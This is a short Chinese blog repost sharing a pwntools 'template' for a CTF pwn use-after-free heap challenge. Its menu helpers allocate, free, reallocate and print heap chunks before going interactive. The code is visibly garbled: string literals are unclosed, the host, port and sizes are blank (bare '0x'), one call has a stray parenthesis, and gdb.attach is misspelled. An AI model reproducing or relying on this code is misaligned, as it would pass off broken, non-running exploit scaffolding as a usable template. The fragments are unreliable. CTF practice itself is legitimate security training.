我是靠谱客的博主 直率乌龟,最近开发中收集的这篇文章主要介绍CTF pwn普通UAF题目模板,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

from pwn import *
context(log_level='debug')
elf=ELF('./)
r=remote("","")
#r=process('./')
def create(size,content):
r.sendlineafter("Your choice: ",'1')
r.sendlineafter("Please input size: ",str(size))
r.sendafter("Please input content: ",content)
def delete(index):
r.sendlineafter("Your choice: ",'2')
r.sendlineafter("Please input list index: ",str(index))
def printf(index):
r.sendlineafter("Your choice: ",'3')
r.sendlineafter("Please input list index: ",str(index))
create(0x,'aaaa') #0
create(0x,'bbbb') #1
delete(0)
delete(1)
#gad.attach(r)
create(0x,))
printf(0)
r.interactive()

最后

以上就是直率乌龟为你收集整理的CTF pwn普通UAF题目模板的全部内容,希望文章能够帮你解决CTF pwn普通UAF题目模板所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(42)

评论列表共有 0 条评论

立即
投稿
返回
顶部